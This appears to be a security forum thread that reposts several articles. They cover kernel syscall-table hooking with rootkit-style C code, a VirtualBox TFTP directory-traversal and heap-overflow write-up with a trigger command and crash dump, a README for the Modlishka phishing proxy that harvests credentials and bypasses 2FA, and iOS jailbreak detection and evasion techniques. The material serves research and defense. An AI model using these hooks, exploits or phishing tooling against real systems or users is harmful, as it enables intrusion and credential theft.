    x; \
    __cr0 = read_cr0() | X86_CR0_WP; \
    BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \
    write_cr0(__cr0); \
    preempt_enable(); \
  } while (0)

(The astute will notice that this is almost identical to the "rare write" mechanism from PaX/grsecurity. This is not a coincidence: it's based on it!)

What's next?

The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault:

asmlinkage long phony_read(int fd, char __user *buf, size_t count)
{
  return -ENOSYS;
}

...or a fault for a particular user:

asmlinkage long phony_read(int fd, char __user *buf, size_t count)
{
  if (current_uid().val == 1005) {
    return -ENOSYS;
  } else {
    return orig_read(fd, buf, count);
  }
}

...or return bogus data:

asmlinkage long phony_read(int fd, char __user *buf, size_t count)
{
  unsigned char kbuf[1024];
  memset(kbuf, 'A', sizeof(kbuf));
  copy_to_user(buf, kbuf, sizeof(kbuf));

  return sizeof(kbuf);
}

Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound!
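In the same spirit, here is one more variant of my own (an illustrative sketch, not code from the original post): since syscalls run in task context, the replacement can key off fields of current, for example faulting reads only for a process with a particular name. current->comm and TASK_COMM_LEN are real kernel definitions; the target name "victim" is just an example.

asmlinkage long phony_read(int fd, char __user *buf, size_t count)
{
  /* Inject an I/O error only for tasks named "victim"; every other
   * process gets the real read(2). */
  if (strncmp(current->comm, "victim", TASK_COMM_LEN) == 0) {
    return -EIO;
  }

  return orig_read(fd, buf, count);
}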
Wrap up

This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you'll need to read a good kernel module programming guide[6] and do the legwork yourself.

Our new tool, KRF, does everything mentioned above and more: it can intercept and fault syscalls with per-executable precision, operate on an entire syscall "profile" (e.g., all syscalls that touch the filesystem or perform process scheduling), and can fault in real-time without breaking a sweat. Oh, and static linkage doesn't bother it one bit: if your program makes any syscalls, KRF will happily fault them.

Other work

Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there:

- syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it's still pretty cool.
- ptrace(2) can be used to instrument syscalls made by a child process, all within user-space. It comes with two considerable downsides, though: it can't be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It's also slow. Chris Wellons's awesome blog post covers ptrace(2)'s many abilities.

Footnotes:

[1] More of a "service request" than a "function" in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication.
[2] The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel's vDSO for many frequently called syscalls, like time(2).
[3] No process context switch is necessary. Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur.
[4] I won't detail this because it's outside of this post's scope, but consider that init_module(2) and delete_module(2) are just normal syscalls.
[5] Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child.
[6] This one's over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search.

Sursa: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  17. IPv6 Talks & Publications

First of all, a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track, I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self-plug, I then decided to put together a list of IPv6 talks I myself gave on several occasions and of publications I (co-)authored. Please find this list below (sorted by year); you can click on the titles to access the respective documents/sources. I hope some of this can be of help for one or the other among you in the course of your own IPv6 efforts.

Cheers, Enno

2018
- IPv6 Address Management – The First Five Years
- Properties of IPv6 and Their Implications for Offense & Defense

2017
- Why it might make sense to use IPv6 in enterprise infrastructure projects
- Position Paper on an Enterprise Organization's IPv6 Address Strategy
- Balanced Security for IPv6 CPE Revisited
- Local Packet Filtering with IPv6
- IPv6 Address Selection – A Look from the Lab
- Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications
- Testing RFC 6980 Implementations with Chiron
- IPv6 configuration approaches for servers / slides with additional infos
- IPv6 Properties of Windows Server 2016 / Windows 10

2016
- Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404
- IPv6 from a Developers' Perspective
- Things to Consider When Deploying IPv6 in Enterprise Space
- IPv6 & Threat Intelligence
- Protecting Hosts in IPv6 Networks
- Remote Access and Business Partner Connections
- Developing an Enterprise IPv6 Security Strategy
- Dual Stack vs. IPv6-only in Enterprise Networks
- Things to Consider When Starting Your IPv6 Deployment
- IPv6 Address Planning in 2016 / Observations

2015
- Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security
- Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer
- Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I)
- Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II)
- Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features
- Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level
- Some Notes on the "Drop IPv6 Fragments" vs. "This Will Break DNS[SEC]" Debate
- IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations
- Main IPv6 Related Mailing Lists
- IPv6 in Virtualized Data Centers
- The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them
- Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6
- IPv6 Address Planning / Some Notes
- OS IPv6 Behavior in Conflicting Environments
- What to Do Today if You Want to Deploy IPv6 Tomorrow
- Is IPv6 more Secure than IPv4? Or Less?
- IPv6 & Complexity
- MLD Considered Harmful
- Reliable & Secure DHCPv6
- IPv6-related Requirements for the Internet Uplink or MPLS Networks
- An MLD Testing Methodology
- Is RFC 6939 Support Finally Here – Checking the Implementation of the "Client Link Layer Address Option" in DHCPv6
- /48 Considered Harmful. On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs
- The Persistent Problem of State in IPv6 (Security)
- IPv6-related Requirements for Security Devices
- Evaluation of IPv6 Capabilities of Commercial IPAM Solutions

2014
- Security Implications of Using IPv6 GUAs Only
- Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region
- Evasion of High-End IDPS Devices at the IPv6 Era
- IPv6 in RFIs/Tendering Processes
- Protocol Properties & Attack Vectors
- Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2
- I Don't Have Any Neighbors – A Deep Dive into DHCPv6, Part 1
- Security Implications of Disruptive Technologies
- IPv6 for Managers
- IPv6 Requirements for Cloud Service Providers
- IPv6 Address Plan Considerations, Part 3: The Plan
- IPv6 Address Plan Considerations, Part 2: The "PI Space from (Single|Multiple) RIR(s) Debate"
- IPv6 Address Plan Considerations, Part 1: General Guidelines

2013
- Design & Configuration of IPv6 Segments with High Security Requirements
- IPv6 Capabilities of Commercial Security Components
- IPAM Requirements in IPv6 Networks
- IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1

2012
- IPv6 Privacy Extensions

2011
- Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt
- IPv6 Security Part 2, RA Guard – Let's get practical
- IPv6 Security Part 1, RA Guard – The Theory

Sursa: https://insinuator.net/2019/01/ipv6-talks-publications/
  18. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553]

In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered by an unprivileged guest user, in the default configuration and without Guest Additions installed. The TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (the default configuration) runs a read-only TFTP server at the IP address 10.0.2.4 to support PXE boot.

CVE-2019-2553 - Directory traversal vulnerability

The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source:

 * This code is based on:
 *
 * tftp.c - a simple, read-only tftp server for qemu

The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below:

/**
 * This function evaluate file name.
 * @param pu8Payload
 * @param cbPayload
 * @param cbFileName
 * @return VINF_SUCCESS -
 *         VERR_INVALID_PARAMETER -
 */
DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession)
{
    size_t cbSessionFilename = 0;
    int rc = VINF_SUCCESS;
    AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER);
    cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX);
    if (   !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3)
        || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/')
        ||  RTStrStr((const char *)pcTftpSession->pszFilename, "/../"))
        rc = VERR_FILE_NOT_FOUND;

    /* only allow exported prefixes */
    if (RT_SUCCESS(rc) && !tftp_prefix)
        rc = VERR_INTERNAL_ERROR;
    LogFlowFuncLeaveRC(rc);
    return rc;
}

This code again is based on the validation done in QEMU (slirp/tftp.c):

/* do sanity checks on the filename */
if (!strncmp(req_fname, "../", 3) ||
    req_fname[strlen(req_fname) - 1] == '/' ||
    strstr(req_fname, "/../")) {
    tftp_send_error(spt, 2, "Access violation", tp);
    return;
}

An interesting observation here is that the above validation done in QEMU is specific to Linux hosts; however, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as a directory separator in Windows, the validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to the TFTP root folder is C:\Users\\.VirtualBox\TFTP. The payload to read other files from the host needs to be crafted accordingly. Below is the demo:

CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option

The function tftpSessionOptionParse() sets the value of TFTP options:

DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader)
{
    ...
    else if (fWithArg)
    {
        if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName))
        {
            rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize);
            if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX)
                rc = VERR_INVALID_PARAMETER;
        }
    ...

The 'blksize' option is only rejected if the value is > UINT16_MAX. Later, the value of OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content:

DECLINLINE(int) tftpReadDataBlock(PNATState pData,
                                  PTFTPSESSION pcTftpSession,
                                  uint8_t *pu8Data,
                                  int *pcbReadData)
{
    RTFILE hSessionFile;
    int rc = VINF_SUCCESS;
    uint16_t u16BlkSize = 0;
    ...
    AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER);
    ...
    u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value;
    ...
    rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead);
    ...
}

The pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect: during the call to RTFileRead(), the file contents can overflow the buffer adjacent to pu8Data when blksize is set to a value greater than the MTU. This bug can be used in combination with the directory traversal bug to trigger the heap overflow with controlled data, e.g. if shared folders are enabled, the guest can drop a file with arbitrary contents on the host, then read the file back using the directory traversal bug.

For ease of debugging, let's use VirtualBox for Linux. Create a file of size, say, UINT16_MAX in the host TFTP root folder (i.e. ~/.config/VirtualBox/TFTP), then read the file from the guest with a large blksize value:

guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload 10.0.2.4

Thread 30 "NAT" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff8ccf4700 (LWP 11024)]
[----------------------------------registers-----------------------------------]
RAX: 0x4141414141414141 ('AAAAAAAA')
RBX: 0x7fff8e5f16dc ('A' ...)
RCX: 0x1
RDX: 0x4141414141414141 ('AAAAAAAA')
RSI: 0x800
RDI: 0x140e730 --> 0x219790326
RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...)
RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...)
RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx)
R8 : 0x0
R9 : 0x10
R10: 0x41414141 ('AAAA')
R11: 0x7fff8e5f1de4 ('A' ...)
R12: 0x140e720 --> 0xdead0002
R13: 0x7fff8e5f1704 ('A' ...)
R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...)
R15: 0x140e730 --> 0x219790326
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fff9457d89f <slirp_uma_alloc>: test   rax,rax
   0x7fff9457d8a2 <slirp_uma_alloc>: je     0x7fff9457d8b0 <slirp_uma_alloc>
   0x7fff9457d8a4 <slirp_uma_alloc>: mov    rdx,QWORD PTR [rbx+0x20]
=> 0x7fff9457d8a8 <slirp_uma_alloc>: mov    QWORD PTR [rax+0x20],rdx
   0x7fff9457d8ac <slirp_uma_alloc>: mov    rax,QWORD PTR [rbx+0x18]
   0x7fff9457d8b0 <slirp_uma_alloc>: mov    rdx,QWORD PTR [rbx+0x20]
   0x7fff9457d8b4 <slirp_uma_alloc>: mov    QWORD PTR [rdx],rax
   0x7fff9457d8b7 <slirp_uma_alloc>: mov    rax,QWORD PTR [r12+0x88]
[------------------------------------stack-------------------------------------]
0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...)
0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002
0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045
0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0
0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326
0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0
0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...)
0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV

Posted by Reno Robert at 6:41 PM

Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
  19. ..Modlishka..

Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side). Enjoy!

Features

Some of the most important 'Modlishka' features:

- Support for majority of 2FA authentication schemes (by design).
- No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically).
- Full control of "cross" origin TLS traffic flow from your victims' browsers (through custom new techniques).
- Flexible and easily configurable phishing scenarios through configuration options.
- Pattern based JavaScript payload injection.
- Stripping the website of all encryption and security headers (back to 90's MITM style).
- User credential harvesting (with context based on URL parameter passed identifiers).
- Can be extended with your ideas through plugins.
- Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer.
- Web panel with a summary of collected credentials and user session impersonation (beta).
- Written in Go.

Action

"A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275

Note: google.com was chosen here just as a POC.

Installation

Latest source code version can be fetched from here (zip) or here (tar).

Fetch the code with 'go get':

$ go get -u github.com/drk1wi/Modlishka

Compile the binary and you are ready to go:

$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make

# ./dist/proxy -h

Usage of ./dist/proxy:
  -cert string
        base64 encoded TLS certificate
  -certKey string
        base64 encoded TLS certificate key
  -certPool string
        base64 encoded Certification Authority certificate
  -config string
        JSON configuration file. Convenient instead of using command line switches.
  -credParams string
        Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
  -debug
        Print debug information
  -disableSecurity
        Disable security features like anti-SSRF. Disable at your own risk.
  -jsRules string
        Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
  -listeningAddress string
        Listening address (default "127.0.0.1")
  -listeningPort string
        Listening port (default "443")
  -log string
        Local file to which fetched requests will be written (appended)
  -phishing string
        Phishing domain to create - Ex.: target.co
  -plugins string
        Comma seperated list of enabled plugin names (default "all")
  -postOnly
        Log only HTTP POST requests
  -rules string
        Comma separated list of 'string' patterns and their replacements.
  -target string
        Main target to proxy - Ex.: https://target.com
  -targetRes string
        Comma separated list of target subdomains that need to pass through the proxy
  -terminateTriggers string
        Comma separated list of URLs from target's origin which will trigger session termination
  -terminateUrl string
        URL to redirect the client after session termination triggers
  -tls
        Enable TLS (default false)
  -trackingCookie string
        Name of the HTTP cookie used to track the victim (default "id")
  -trackingParam string
        Name of the HTTP parameter used to track the victim (default "id")

Usage

Check out the wiki page for a more detailed overview of the tool usage.

FAQ (Frequently Asked Questions)

Blog post

License

Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here.
Credits

Thanks for helping with the code go to Giuseppe Trotta (@Giutro).

Disclaimer

This tool is made only for educational purposes and may only be used in legitimate penetration tests. The author does not take any responsibility for any actions taken by its users.

Sursa: https://github.com/drk1wi/Modlishka
20. JANUARY 18TH, 2019

Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them

Why Do People Jailbreak?

Apple's software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store, or to make modifications to the behavior of the operating system, a "jailbreak" is required—effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores.

Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google's Project Zero says:

Apple does not provide a "developer-mode" iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device's security model (i.e., by jailbreaking).

In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user's rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application.

The History of Jailbreaking

The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz's original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after. Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones.

The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can exceed $1,000,000 under the right criteria (remote, persistent, and zero-click), making a private sale a much more lucrative option than releasing it publicly.

Why Do We Care About Jailbreaking at Duo?

At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network.

Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device. First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device. The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases. Administrators may want to allow only up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version.
As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state.

* While, in general, we can expect that the App Store review process will prevent actively malicious applications from being distributed on the App Store, this is not always the case. The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store.

How Are Jailbreaks Usually Detected?

There exists only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of "special sauce": developers of mobile applications would rather keep their methodology private, and there is no real incentive to talk about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools.

Most jailbreak detection methods fall into the following categories (a C sketch of the file-existence and sandbox checks appears at the end of this section):

- File existence checks
- URI scheme registration checks
- Sandbox behavior checks
- Dynamic linker inspection

File Existence

Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this file exists on the filesystem, you can be sure your application is running on a jailbroken device. There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm.

URI Schemes

iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia. iOS allows applications to check which URI schemes are registered, so the presence of the cydia:// URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false positive on a non-jailbroken device.

Sandbox Behavior

Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device.

Dynamic Linker Inspection

Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality - the alternative to this is "static linking," where all code that an executable uses is shipped with the executable.
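To make the above concrete, here is a rough C sketch (mine, not Duo's implementation) of the file-existence and sandbox checks just described; the artifact list is illustrative, and real products check many more paths:

#include <stdio.h>
#include <sys/stat.h>  /* stat */
#include <sys/wait.h>  /* waitpid */
#include <unistd.h>    /* fork */

/* Illustrative jailbreak artifacts; real checkers use longer lists. */
static const char *artifacts[] = {
    "/Applications/Cydia.app",
    "/bin/bash",
    "/usr/sbin/sshd",
};

int looks_jailbroken(void)
{
    struct stat st;
    for (unsigned i = 0; i < sizeof(artifacts) / sizeof(artifacts[0]); i++)
        if (stat(artifacts[i], &st) == 0)
            return 1;            /* artifact present on the filesystem */

    /* Sandbox check: fork() must fail inside an untampered iOS sandbox. */
    pid_t pid = fork();
    if (pid >= 0) {
        if (pid == 0)
            _exit(0);            /* child: exit immediately */
        waitpid(pid, NULL, 0);   /* parent: reap the child */
        return 1;                /* fork succeeded: sandbox was patched */
    }
    return 0;
}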
While we haven't discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and it exposes the ability to inspect the libraries loaded into the currently running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and number of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken.

How Do End Users Prevent Detection?

Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo's case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications. For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality so that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary.

Objective-C Runtime Method Hooking

Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (à la Smalltalk). This stands in contrast to languages like C, in which a function call might take the form of a jump to the called function's location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as "method swizzling," and takes the form of a call to class_addMethod or method_setImplementation.

fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique.

Editing the Linker Table

When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time they are called, and non-lazy symbol pointers are resolved before the program runs. You can read more about how the linker works on Mike Ash's blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called.

A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook. Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior. This is an example of a hooked version of the fopen function.
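The original post shows the hooked fopen as a screenshot. Based on the description that follows, its behavior can be reconstructed in C roughly as below; the function names and the forbidden list are illustrative, not taken from any specific tool:

#include <stdio.h>
#include <string.h>

/* Saved pointer to the real fopen, captured when the lazy symbol
 * pointer was swapped out (hypothetical plumbing). */
static FILE *(*orig_fopen)(const char *path, const char *mode);

static const char *forbidden[] = {
    "/Applications/Cydia.app",
    "/bin/bash",
    "/usr/sbin/sshd",
};

/* Replacement installed in fopen's __la_symbol_ptr slot. */
FILE *hooked_fopen(const char *path, const char *mode)
{
    if (path)
        for (unsigned i = 0; i < sizeof(forbidden) / sizeof(forbidden[0]); i++)
            if (strcmp(path, forbidden[i]) == 0)
                return NULL;           /* pretend the artifact cannot be opened */
    return orig_fopen(path, mode);     /* otherwise defer to the real fopen */
}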
As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or null if it cannot open the file. If fopen returns non-null when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken.

The above hooked version checks the path of the file to be opened against a list of "forbidden" files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation.

Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, are hooked to always return a constant value (for example, a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox).

Patching the Linker

We mentioned that dyld exposes functionality that allows clients to inspect which libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this. To combat this, some anti-jailbreak-detection tools also hook the exposed dyld functionality to hide their presence.

A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools.

Summary

These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report "correct" answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible.

Can We Reliably Detect Jailbroken Devices?

We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc.) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call the fopen syscall wrapper exposed as part of a shared library. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working.

As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel.
It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say "hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it?" Functions like fopen are just that—functions—but they wrap a special type of instruction used to jump into the kernel.

On the x86 architecture, under Linux, the INT 0x80 instruction is the most well-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for "interrupt," and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code.

The iPhone uses the ARM processor architecture. ARM's equivalent of INT is the SVC opcode ("Supervisor Call"), and the equivalent to INT 0x80 on an ARM processor is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in user space, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file.

The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can actually perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering.

Drawbacks

Even though this approach solves some of our problems, there are drawbacks. First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not.

Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn't make it impossible. The flow of the data after the syscall—say, a boolean that indicates whether a jailbreak artifact exists—is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel.

Conclusion

